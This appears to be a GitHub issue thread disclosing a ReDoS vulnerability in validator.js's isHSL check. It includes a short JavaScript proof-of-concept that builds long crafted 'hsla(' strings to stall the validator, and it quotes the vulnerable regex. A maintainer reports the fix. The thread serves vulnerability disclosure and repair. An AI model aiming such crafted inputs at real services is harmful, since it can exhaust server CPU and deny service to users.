ReDoS in isHSL

[yetingli]

Describe the bug
It allows cause a Regular Expression Denial of Service (REDoS) when checking if the crafted string is a hsl.

Examples

var validator = require("validator")
function build_attack(n) {
	var ret = "hsla(0"
	for (var i = 0; i < n; i++) {
		ret += " "
	}

	return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
       validator.isHSL(attack_str)
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
   }
}

Additional context
Validator.js version: 14.10.0
Node.js version:
OS platform: windows

[fedeci]

This is the regex affected, the second one does not suffer of this problem

validator.js/src/lib/isHSL.js

Line 4 in 1b85829

const hslcomma = /^(hsl)a?\(\s*((\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?))(deg|grad|rad|turn|\s*)(\s*,\s*(\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?)%){2}\s*(,\s*((\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?)%?)\s*)?\)$/i;

[yetingli]

This is the regex affected, the second one does not suffer of this problem

validator.js/src/lib/isHSL.js

Line 4 in 1b85829

const hslcomma = /^(hsl)a?\(\s*((\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?))(deg|grad|rad|turn|\s*)(\s*,\s*(\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?)%){2}\s*(,\s*((\+|\-)?([0-9]+(\.[0-9]+)?(e(\+|\-)?[0-9]+)?|\.[0-9]+(e(\+|\-)?[0-9]+)?)%?)\s*)?\)$/i;

You're right.

[profnandaa]

Sorry for the late ACK, I should work on a fix for this, this weekend before our release. Thanks for raising!

[profnandaa]

fixed in #1651